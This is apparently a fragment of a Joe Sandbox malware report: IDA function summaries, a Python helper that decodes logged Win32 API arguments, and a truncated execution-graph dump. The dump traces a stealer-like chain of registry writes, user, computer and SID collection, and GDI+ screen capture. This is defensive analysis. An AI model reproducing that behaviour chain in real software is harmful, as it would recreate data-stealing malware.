                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00799854
                                                                                                        • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 00799882
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 2263783195-0
                                                                                                        • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                        • Instruction ID: 455c035d9e8ffe5e4584b81bd9c1c3b8f54db6c7cb81aaa7735b809c045b11f7
                                                                                                        • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                        • Instruction Fuzzy Hash: 18010075640108FBDB10DE99DD81F9EB3B9AF89714F20C159FA189B291D631EE02DB90

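The "APIs" entries in these function summaries log every argument as raw hex, which hides what the calls actually do: the access mask and creation disposition passed to CreateFileW, or the SYSTEM_INFORMATION_CLASS value 5 handed to NtQuerySystemInformation. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin. It parses the report's "Api.Module(args), ref: addr" lines, decodes the arguments against the documented Win32 constants, and pairs a GENERIC_WRITE/CREATE_ALWAYS CreateFileW with a nearby WriteFile, the file-drop idiom of the function at 0x799832. The sample lines are copied from this section; the function names (parse_api_lines, decode, flag_names, find_drop_pattern) and the 0x100-byte proximity window used for pairing are the example's own assumptions.

```python
"""Decode the 'APIs' lines of a Joe Sandbox per-function summary.

Added example, not Joe Sandbox or IDA code. The sample lines are copied
from the report; the constant tables are the documented Win32/NT values
for the arguments the sandbox logged as raw hex.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API reference lines taken verbatim from the report above.
SAMPLE_LINES = """
  • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
• NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 007999C6
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00799264
• CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00799854
• WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 00799882
• VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0079AC57
"""

# Matches "Api.Module(args), ref: addr" wherever it appears on a line; the
# surrounding bullet or "Part of subcall function ..." prefix is ignored.
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented constants (winnt.h / fileapi.h / winternl.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
SYSTEM_INFORMATION_CLASS = {0: "SystemBasicInformation", 5: "SystemProcessInformation",
                            11: "SystemModuleInformation", 16: "SystemHandleInformation"}


@dataclass
class ApiRef:
    api: str
    module: str
    args: list   # one int per argument slot, None where the sandbox printed '?'
    ref: int     # address of the call site


def parse_api_lines(text: str) -> list:
    """Pull every 'Api.Module(args), ref: addr' reference out of a block of report text."""
    refs = []
    for m in API_RE.finditer(text):
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m["args"].split(",") if a.strip()]
        refs.append(ApiRef(m["api"], m["mod"], args, int(m["ref"], 16)))
    return refs


def flag_names(value: Optional[int], table: dict) -> list:
    """Expand a bit mask into constant names; bits not in the table are kept as hex."""
    if value is None:
        return ["?"]
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def decode(ref: ApiRef) -> dict:
    """Translate the raw argument slots of the APIs this report uses into names."""
    a = ref.args
    if ref.api == "CreateFileW" and len(a) >= 6:
        # CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
        #             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
        return {"access": flag_names(a[1], GENERIC_ACCESS),
                "share": flag_names(a[2], SHARE_MODE),
                "disposition": DISPOSITION.get(a[4], hex(a[4]) if a[4] is not None else "?"),
                "flags": flag_names(a[5], FILE_FLAGS)}
    if ref.api == "NtQuerySystemInformation" and len(a) >= 3:
        # NtQuerySystemInformation(SystemInformationClass, Buffer, Length, ReturnLength)
        return {"class": SYSTEM_INFORMATION_CLASS.get(a[0], str(a[0])),
                "buffer_len": a[2]}
    if ref.api == "VirtualProtect" and len(a) >= 3:
        # Static argument recovery often yields '?' for the new protection; keep it visible.
        return {"new_protect": flag_names(a[2], PAGE_PROTECT)}
    return {}


def find_drop_pattern(refs: list, window: int = 0x100) -> list:
    """Call-site pairs where a GENERIC_WRITE/CREATE_ALWAYS CreateFileW is followed by a
    WriteFile within `window` bytes (assumed proximity heuristic for 'same function')."""
    pairs = []
    for r in refs:
        if r.api != "CreateFileW":
            continue
        d = decode(r)
        if "GENERIC_WRITE" not in d.get("access", []) or d.get("disposition") != "CREATE_ALWAYS":
            continue
        for w in refs:
            if w.api == "WriteFile" and r.ref < w.ref <= r.ref + window:
                pairs.append((r.ref, w.ref))
                break
    return pairs


if __name__ == "__main__":
    refs = parse_api_lines(SAMPLE_LINES)
    for r in refs:
        print(f"{r.ref:08x} {r.api:<26} {decode(r)}")
    print("file-drop call sites:", [(hex(c), hex(w)) for c, w in find_drop_pattern(refs)])
```

For another report, the whole page text can be fed to parse_api_lines unchanged, since the regex only keys on the "Api.Module(args), ref: addr" shape. Extend the constant tables for whichever APIs that report logs; the '?' handling matters because pointer-valued slots are routinely unrecoverable from a static snapshot.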
                                                                                                        Control-flow Graph

control_flow_graph: single basic block 250 (0x798e72-0x798eae) calling 0x799902 (the GlobalAlloc wrapper), 0x799442 and LoadLibraryW.
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00798EA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobalLibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 3361179946-0
                                                                                                        • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                        • Instruction ID: 64032cd6c8b0e020cdd1c27ec6039522d1b8c79b76d13af45cfa8f308a4c98e8
                                                                                                        • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                        • Instruction Fuzzy Hash: F6E0EDB5E00208FBCB40EFA8DD8299E7BB8AF58211F508198F90897341E635EA118B91

                                                                                                        Control-flow Graph

control_flow_graph (edge dump collapsed): function 0x79ae92-0x79b0c8, basic blocks 255-292. Block 255 (0x79ae92-0x79aee0) calls 0x799372; block 266 (0x79af36-0x79af62) calls malloc; block 272 (0x79b01b-0x79b032) calls 0x799f62; block 282 (0x79afae-0x79afec) calls 0x79ad02 inside a loop (282->273, 276->267); blocks 285/286 (0x79b08a-0x79b0b5) form a second loop (286->285). Exit via block 262 (0x79b0c5-0x79b0c8).
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                        • Instruction ID: b26e80b44b30d117393629bb3d3fbcca84a942a999038a519fb3e1ae9ba7d236
                                                                                                        • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                        • Instruction Fuzzy Hash: F791D7B5D04209EFCF08CF98D881AEEBBB6BF88300F108158E515AB351D735AA45CFA1

                                                                                                        Control-flow Graph

control_flow_graph: function 0x799902-0x799937, basic blocks 317-319. Block 317 (0x799902-0x799910) branches to 319 (0x799912-0x79991b) or directly to 318 (0x79991e-0x799937), which calls GlobalAlloc; 319 falls through to 318.
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 3761449716-0
                                                                                                        • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                        • Instruction ID: 5a233fd34c04cdac1d28563dd86f1bc3a58f75e7caf54104958144e638a175d2
                                                                                                        • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                        • Instruction Fuzzy Hash: BDF0A578604208EFCB44CF98D480959B7B5FB8C320F10C299FC188B301C630EE81CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                        • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                                        • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                        • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                                                                        Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 41.9%
Total number of Nodes: 1517
Total number of Limit Nodes: 16
execution_graph (node/edge dump, broken across lines and cut off mid-listing at node 29394 in extraction; collapsed to the call chains that are recoverable from it):
• 0x789b4b -> 0x78a37f IsProcessorFeaturePresent; 0x78c469 (10 API calls) and 0x78c488 (7 API calls): CRT start-up.
• 0x799ffd -> 0x79e952, 0x79e00b, 0x79e037, 0x79e063 (each 25 API calls via 0x78ea28 __wsopen_s, 14 API calls via 0x790c72 __dosmaperr); 0x792100 EnterCriticalSection / 0x79e9a6 LeaveCriticalSection; 0x7896b0 _ValidateLocalCookies -> 0x7896b9 IsProcessorFeaturePresent -> 0x7898a8 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess.
• 0x78ea55 (__Getctype, 11 API calls) -> 0x78e87c -> 0x78e8c4 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter -> 0x78e9b3 GetCurrentProcess, TerminateProcess.
• 0x79e82b / 0x79e430 / 0x79e6d1 (41 API calls): 0x79e736 GetTimeZoneInformation; 0x797c06 _free -> 0x797c11 HeapFree, 0x797c2c GetLastError; 0x797e35 (15 API calls), 0x792427 (37 API calls), 0x79e910 (42 API calls), 0x79e3e9 (42 API calls).
• 0x7962ec GetStartupInfoW -> 0x799c3f -> 0x799b8f -> 0x79a21a -> 0x79a252 RtlAllocateHeap; 0x796361 GetFileType; 0x7933e3 EnterCriticalSection, LeaveCriticalSection; 0x7984a9 (6 API calls, std::_Locinfo ctor).
• 0x780aa0 -> 0x76c6d0 Sleep, CreateMutexA, GetLastError (-> 0x76c70a GetLastError -> 0x78dc4e, 0x76aca0 and 0x76a940 (115 API calls each) -> 0x76c774 SetCurrentDirectoryA -> 0x783030 (70 API calls), 0x7661f0 (114 API calls), 0x7845e0, 0x785430, 0x782eb0 (27 API calls each), 0x768e10 (115 API calls)); then 0x780aab -> 0x7713c0 -> 0x771c50 -> 0x785610, 0x782f70 -> 0x771e13 GetModuleFileNameA -> 0x78ded0 -> 0x769ed0 GetFileAttributesA, 0x771f42 CreateDirectoryA, 0x769ea0 (68 API calls), 0x76a8c0, 0x770e40, 0x7626a0, 0x78e4b9 (67 API calls), 0x782ff0; then 0x780a50 CreateThread x3 -> 0x7808a0, 0x780930, 0x7809c0, with 0x780a90 Sleep looping on itself.
• 0x772072 -> 0x77f060 -> 0x7678e0, 0x782f70, 0x7693d0, 0x7643e0 -> 0x77f11b RegOpenKeyExA, RegCloseKey -> 0x783030 / 0x7661f0 -> 0x77f1c3 GetUserNameA -> 0x783f40 -> 0x76b250 GetComputerNameExW -> 0x769e20 -> 0x7643e0 ... (listing ends here).
77f309 29393->29394 29395 783030 70 API calls 29394->29395 29396 77f31f 29395->29396 29397 7661f0 114 API calls 29396->29397 29398 77f32a 29397->29398 29399 783030 70 API calls 29398->29399 29400 77f34d 29399->29400 29401 7661f0 114 API calls 29400->29401 29402 77f358 29401->29402 29403 783030 70 API calls 29402->29403 29404 77f37b 29403->29404 29405 7661f0 114 API calls 29404->29405 29406 77f386 29405->29406 29407 783030 70 API calls 29406->29407 29408 77f3a9 29407->29408 29409 7661f0 114 API calls 29408->29409 29410 77f3b4 29409->29410 29411 783030 70 API calls 29410->29411 29412 77f3d7 29411->29412 29413 7661f0 114 API calls 29412->29413 29414 77f3e2 29413->29414 29415 783030 70 API calls 29414->29415 29416 77f405 29415->29416 29417 7661f0 114 API calls 29416->29417 29418 77f410 29417->29418 29419 783030 70 API calls 29418->29419 29420 77f433 29419->29420 29421 7661f0 114 API calls 29420->29421 29422 77f43e 29421->29422 29423 783030 70 API calls 29422->29423 29424 77f461 29423->29424 29425 7661f0 114 API calls 29424->29425 29426 77f46c 29425->29426 29427 783030 70 API calls 29426->29427 29428 77f48d 29427->29428 29429 7661f0 114 API calls 29428->29429 29430 77f498 29429->29430 29431 783030 70 API calls 29430->29431 29432 77f4aa 29431->29432 29433 7661f0 114 API calls 29432->29433 29434 77f4b5 29433->29434 29435 783030 70 API calls 29434->29435 29436 77f4c7 29435->29436 29437 7661f0 114 API calls 29436->29437 29438 77f4d2 29437->29438 29439 783030 70 API calls 29438->29439 29440 77f4ef 29439->29440 29441 7661f0 114 API calls 29440->29441 29442 77f4fa 29441->29442 29443 7845e0 27 API calls 29442->29443 29444 77f50e 29443->29444 29445 785430 27 API calls 29444->29445 29446 77f528 29445->29446 29447 785430 27 API calls 29446->29447 29448 77f545 29447->29448 29449 785430 27 API calls 29448->29449 29450 77f562 29449->29450 29451 7845e0 27 API calls 29450->29451 29452 77f577 29451->29452 29453 785430 27 API calls 29452->29453 29454 77f596 29453->29454 29455 7845e0 27 
API calls 29454->29455 29456 77f5ab 29455->29456 29457 785430 27 API calls 29456->29457 29458 77f5ca 29457->29458 29459 7845e0 27 API calls 29458->29459 29460 77f5df 29459->29460 29461 785430 27 API calls 29460->29461 29462 77f5fe 29461->29462 29463 7845e0 27 API calls 29462->29463 29464 77f613 29463->29464 29465 785430 27 API calls 29464->29465 29466 77f632 29465->29466 29467 7845e0 27 API calls 29466->29467 29468 77f647 29467->29468 29469 785430 27 API calls 29468->29469 29470 77f666 29469->29470 29471 7845e0 27 API calls 29470->29471 29472 77f67b 29471->29472 29473 785430 27 API calls 29472->29473 29474 77f69a 29473->29474 29475 7845e0 27 API calls 29474->29475 29476 77f6af 29475->29476 29477 785430 27 API calls 29476->29477 29478 77f6ce 29477->29478 29479 7845e0 27 API calls 29478->29479 29480 77f6e3 29479->29480 29481 785430 27 API calls 29480->29481 29482 77f702 29481->29482 29483 785430 27 API calls 29482->29483 29484 77f724 29483->29484 29485 785430 27 API calls 29484->29485 29486 77f746 29485->29486 29487 7845e0 27 API calls 29486->29487 29492 77f75b _Ref_count_obj 29487->29492 29488 780458 29491 783030 70 API calls 29488->29491 29489 780383 29490 783030 70 API calls 29489->29490 29493 780399 29490->29493 29494 78046d 29491->29494 29492->29488 29492->29489 29495 7661f0 114 API calls 29493->29495 29496 783030 70 API calls 29494->29496 29497 7803a4 29495->29497 29498 780482 29496->29498 29499 7845e0 27 API calls 29497->29499 30137 764d60 27 API calls _Ref_count_obj 29498->30137 29501 7803b8 29499->29501 29503 782f70 25 API calls 29501->29503 29502 780491 30138 76cb00 27 API calls 29502->30138 29514 7803c6 _Ref_count_obj 29503->29514 29505 7804a2 29506 783030 70 API calls 29505->29506 29507 7804b7 29506->29507 29508 7661f0 114 API calls 29507->29508 29509 7804c2 29508->29509 29510 785430 27 API calls 29509->29510 29511 7804dc 29510->29511 29512 782f70 25 API calls 29511->29512 29512->29514 29513 7896b0 _ValidateLocalCookies 5 API calls 29515 780876 
29513->29515 29514->29513 29515->29224 29516->29233 29517->29235 29518->29237 29520 78305b 29519->29520 29521 783062 29520->29521 29522 7830b4 29520->29522 29523 783095 29520->29523 29521->29243 29530 7830a9 _Yarn 29522->29530 29727 7625c0 27 API calls 4 library calls 29522->29727 29524 7830ea 29523->29524 29525 78309c 29523->29525 29728 7625c0 27 API calls 2 library calls 29524->29728 29726 7625c0 27 API calls 4 library calls 29525->29726 29529 7830a2 29529->29530 29531 78ea38 25 API calls 29529->29531 29530->29243 29532 7830f4 29531->29532 29729 76ddc0 68 API calls std::ios_base::_Ios_base_dtor 29532->29729 29534 78310e _Ref_count_obj 29534->29243 29730 765da0 29535->29730 29541 76630f 29544 78ea38 25 API calls 29541->29544 29542 7662e9 _Ref_count_obj 29543 7896b0 _ValidateLocalCookies 5 API calls 29542->29543 29546 76630b 29543->29546 29547 766314 __fread_nolock 29544->29547 29545 76625f _Ref_count_obj 29545->29541 29545->29542 29546->29247 29548 766377 RegOpenKeyExA 29547->29548 29549 7663a6 RegQueryValueExA 29548->29549 29550 7663d0 RegCloseKey 29548->29550 29549->29550 29551 766400 29550->29551 29551->29551 29745 783f40 29551->29745 29553 766480 _Ref_count_obj 29556 7896b0 _ValidateLocalCookies 5 API calls 29553->29556 29554 7664a7 29558 78ea38 25 API calls 29554->29558 29555 766418 _Ref_count_obj 29555->29553 29555->29554 29557 7664a3 29556->29557 29557->29247 29559 7664ac RegOpenKeyExA 29558->29559 29560 766517 RegCloseKey 29559->29560 29561 7664ed RegSetValueExA 29559->29561 29562 766528 _Ref_count_obj 29560->29562 29561->29560 29563 7665e6 29562->29563 29564 7665ce _Ref_count_obj 29562->29564 29566 78ea38 25 API calls 29563->29566 29565 7896b0 _ValidateLocalCookies 5 API calls 29564->29565 29567 7665e2 29565->29567 29568 7665eb 29566->29568 29567->29247 29760 7915a7 29568->29760 29571 766646 RegSetValueExA 29572 766665 RegCloseKey 29571->29572 29574 766676 _Ref_count_obj 29572->29574 29573 766734 29577 78ea38 25 API calls 29573->29577 29574->29573 29575 
76671c _Ref_count_obj 29574->29575 29576 7896b0 _ValidateLocalCookies 5 API calls 29575->29576 29578 766730 29576->29578 29579 766739 __wsopen_s 29577->29579 29578->29247 29580 783030 70 API calls 29579->29580 29581 7667a0 29580->29581 29582 7661f0 74 API calls 29581->29582 29583 7667ab RegOpenKeyExA 29582->29583 29586 7667d9 __fread_nolock _Ref_count_obj 29583->29586 29585 766d64 29588 7896b0 _ValidateLocalCookies 5 API calls 29585->29588 29586->29585 29587 766d80 29586->29587 29589 766829 RegQueryInfoKeyW 29586->29589 29591 78ea38 25 API calls 29587->29591 29590 766d7c 29588->29590 29592 766d58 RegCloseKey 29589->29592 29622 7668a8 _Ref_count_obj 29589->29622 29590->29247 29593 766d85 GdiplusStartup 29591->29593 29592->29585 29595 766e39 29593->29595 29599 766e13 GetDC 29593->29599 29594 7668b2 RegEnumValueA 29594->29622 29596 767534 29595->29596 29597 766e45 29595->29597 29767 7626a0 27 API calls 29596->29767 29764 7853d0 27 API calls std::_Facet_Register 29597->29764 29605 783030 70 API calls 29599->29605 29600 767539 29603 78ea38 25 API calls 29600->29603 29602 783f40 27 API calls 29602->29622 29606 767552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 29603->29606 29607 766f8b 29605->29607 29609 783030 70 API calls 29606->29609 29610 7661f0 74 API calls 29607->29610 29611 767626 29609->29611 29612 766f96 29610->29612 29613 7661f0 74 API calls 29611->29613 29614 783030 70 API calls 29612->29614 29615 767631 29613->29615 29616 766fb3 29614->29616 29768 762400 44 API calls 29615->29768 29617 7661f0 74 API calls 29616->29617 29619 766fba 29617->29619 29620 783030 70 API calls 29619->29620 29621 766fcf 29620->29621 29623 7661f0 74 API calls 29621->29623 29622->29587 29622->29592 29622->29594 29622->29602 29659 7661f0 74 API calls 29622->29659 29671 783030 70 API calls 29622->29671 29626 766fd6 29623->29626 29624 7678c3 29628 78ea38 25 API calls 29624->29628 29625 767649 _Ref_count_obj 29625->29624 29627 783030 70 API calls 29625->29627 29631 783030 70 
API calls 29626->29631 29630 7676b2 29627->29630 29629 7678c8 29628->29629 29632 78ea38 25 API calls 29629->29632 29633 7661f0 74 API calls 29630->29633 29634 767002 29631->29634 29635 7678cd 29632->29635 29638 7676bd 29633->29638 29636 7661f0 74 API calls 29634->29636 29637 78ea38 25 API calls 29635->29637 29639 76700d 29636->29639 29640 7678d2 29637->29640 29769 762400 44 API calls 29638->29769 29642 785430 27 API calls 29639->29642 29643 767024 29642->29643 29645 785430 27 API calls 29643->29645 29644 76771a GetSidSubAuthorityCount 29646 7677d2 29644->29646 29668 767734 _Ref_count_obj 29644->29668 29653 76703b _Ref_count_obj 29645->29653 29650 783f40 27 API calls 29646->29650 29647 7676d7 _Ref_count_obj 29647->29629 29647->29644 29648 767740 GetSidSubAuthority 29649 783030 70 API calls 29648->29649 29649->29668 29652 767822 29650->29652 29651 7661f0 74 API calls 29651->29668 29655 783f40 27 API calls 29652->29655 29653->29600 29654 76715f _Ref_count_obj 29653->29654 29656 783030 70 API calls 29654->29656 29657 76786f 29655->29657 29660 76719f 29656->29660 29657->29635 29661 76789b _Ref_count_obj 29657->29661 29659->29622 29662 7661f0 74 API calls 29660->29662 29663 7896b0 _ValidateLocalCookies 5 API calls 29661->29663 29664 7671aa 29662->29664 29665 7678bf 29663->29665 29666 7671b5 RegGetValueA 29664->29666 29667 7671b3 29664->29667 29665->29247 29675 7671e5 _Ref_count_obj 29666->29675 29667->29666 29668->29624 29668->29646 29668->29648 29668->29651 29770 762400 44 API calls 29668->29770 29669 767226 GetSystemMetrics 29672 767234 29669->29672 29673 76722d 29669->29673 29670 76722f GetSystemMetrics 29670->29672 29671->29622 29674 783030 70 API calls 29672->29674 29673->29670 29676 76724f 29674->29676 29675->29669 29675->29670 29677 7661f0 74 API calls 29676->29677 29678 76725a RegGetValueA 29677->29678 29680 76728f _Ref_count_obj 29678->29680 29681 7672d3 GetSystemMetrics 29680->29681 29682 7672ca GetSystemMetrics 29680->29682 29684 7672d8 6 API calls 
29681->29684 29683 7672d1 29682->29683 29682->29684 29683->29681 29685 76736b 29684->29685 29686 7673f8 6 API calls 29684->29686 29765 7920a9 15 API calls 3 library calls 29685->29765 29692 76744f _Ref_count_obj 29686->29692 29688 7674e0 GdiplusShutdown 29695 7674f1 _Ref_count_obj 29688->29695 29689 767371 29689->29686 29690 767380 GdipGetImageEncoders 29689->29690 29697 767394 29690->29697 29691 7896b0 _ValidateLocalCookies 5 API calls 29693 767530 29691->29693 29692->29688 29693->29247 29695->29691 29696 7673ef 29696->29686 29766 791861 14 API calls _free 29697->29766 29699 7845f9 29698->29699 29701 78460d _Yarn 29699->29701 29825 7851b0 27 API calls 3 library calls 29699->29825 29701->29261 29703 785473 29702->29703 29704 785600 29703->29704 29705 785540 29703->29705 29711 785478 _Yarn 29703->29711 29828 7626a0 27 API calls 29704->29828 29708 78559b 29705->29708 29709 785575 29705->29709 29707 785605 29829 7625c0 27 API calls 2 library calls 29707->29829 29718 78558d _Yarn 29708->29718 29827 7625c0 27 API calls 4 library calls 29708->29827 29709->29707 29712 785580 29709->29712 29711->29263 29826 7625c0 27 API calls 4 library calls 29712->29826 29713 785586 29716 78ea38 25 API calls 29713->29716 29713->29718 29717 78560f 29716->29717 29718->29263 29719->29267 29720->29272 29830 78e9c4 25 API calls 3 library calls 29721->29830 29723 78ea47 29724 78ea55 __Getctype 11 API calls 29723->29724 29725 78ea54 29724->29725 29726->29529 29727->29530 29728->29529 29729->29534 29771 783e00 27 API calls 3 library calls 29730->29771 29732 765dd1 29733 766060 29732->29733 29772 783e00 27 API calls 3 library calls 29733->29772 29735 7661c6 29738 7651a0 29735->29738 29737 766095 29737->29735 29773 78fdd0 40 API calls __Getctype 29737->29773 29739 765432 29738->29739 29740 765204 29738->29740 29739->29545 29742 765355 29740->29742 29774 78fdd0 40 API calls __Getctype 29740->29774 29775 784f10 27 API calls 3 library calls 29740->29775 29742->29739 29776 784f10 27 API calls 3 
library calls 29742->29776 29748 783f5e _Yarn 29745->29748 29750 783f84 29745->29750 29746 78406e 29779 7626a0 27 API calls 29746->29779 29748->29555 29749 784073 29780 7625c0 27 API calls 2 library calls 29749->29780 29750->29746 29752 783fd8 29750->29752 29753 783ffd 29750->29753 29752->29749 29777 7625c0 27 API calls 4 library calls 29752->29777 29758 783fe9 _Yarn 29753->29758 29778 7625c0 27 API calls 4 library calls 29753->29778 29754 784078 _Ref_count_obj 29754->29555 29757 78ea38 25 API calls 29757->29746 29758->29757 29759 784050 _Ref_count_obj 29758->29759 29759->29555 29761 7915c2 29760->29761 29781 790cd1 29761->29781 29764->29599 29765->29689 29766->29696 29768->29625 29769->29647 29770->29668 29771->29732 29772->29737 29773->29737 29774->29740 29775->29740 29776->29742 29777->29758 29778->29758 29780->29754 29799 78fb57 29781->29799 29783 790d1c 29808 78dee7 29783->29808 29784 790cf8 29806 790c72 14 API calls __dosmaperr 29784->29806 29785 790ce3 29785->29783 29785->29784 29798 76661c RegOpenKeyExA 29785->29798 29788 790cfd 29807 78ea28 25 API calls __wsopen_s 29788->29807 29791 790d28 29792 790d57 29791->29792 29816 791553 40 API calls 2 library calls 29791->29816 29795 790dc1 29792->29795 29817 7914fc 25 API calls 2 library calls 29792->29817 29818 7914fc 25 API calls 2 library calls 29795->29818 29796 790e87 29796->29798 29819 790c72 14 API calls __dosmaperr 29796->29819 29798->29571 29798->29572 29800 78fb5c 29799->29800 29801 78fb6f 29799->29801 29820 790c72 14 API calls __dosmaperr 29800->29820 29801->29785 29803 78fb61 29821 78ea28 25 API calls __wsopen_s 29803->29821 29805 78fb6c 29805->29785 29806->29788 29807->29798 29809 78df07 29808->29809 29810 78defe 29808->29810 29809->29810 29822 796820 37 API calls 3 library calls 29809->29822 29810->29791 29812 78df27 29823 797046 37 API calls __Getctype 29812->29823 29814 78df3d 29824 797073 37 API calls __cftoe 29814->29824 29816->29791 29817->29795 29818->29796 29819->29798 29820->29803 
29821->29805 29822->29812 29823->29814 29824->29810 29825->29701 29826->29713 29827->29718 29829->29713 29830->29723 29831->29298 29833 782f7e 29832->29833 29834 782fa1 _Ref_count_obj 29832->29834 29833->29834 29835 78ea38 25 API calls 29833->29835 29834->29313 29836 782fec 29835->29836 29837->29324 29838->29329 29839->29333 29840->29340 29841->29334 29842->29338 29843->29343 29845->29305 29846->29307 29847->29316 29848->29319 29863 767c4a 29849->29863 29864 76795f _Ref_count_obj 29849->29864 29850 767d12 30140 784450 27 API calls 29850->30140 29851 767c73 29852 783f40 27 API calls 29851->29852 29860 767c92 _Ref_count_obj 29852->29860 29854 767d17 29856 78ea38 25 API calls 29854->29856 29855 783f40 27 API calls 29855->29864 29857 767d1c 29856->29857 29858 767ce8 _Ref_count_obj 29859 7896b0 _ValidateLocalCookies 5 API calls 29858->29859 29861 767d0b 29859->29861 29860->29854 29860->29858 29861->29350 29863->29850 29863->29851 29864->29850 29864->29854 29864->29855 29864->29863 30139 785790 27 API calls _Yarn 29864->30139 30141 78b340 29865->30141 29868 769458 29870 783030 70 API calls 29868->29870 29869 7896b0 _ValidateLocalCookies 5 API 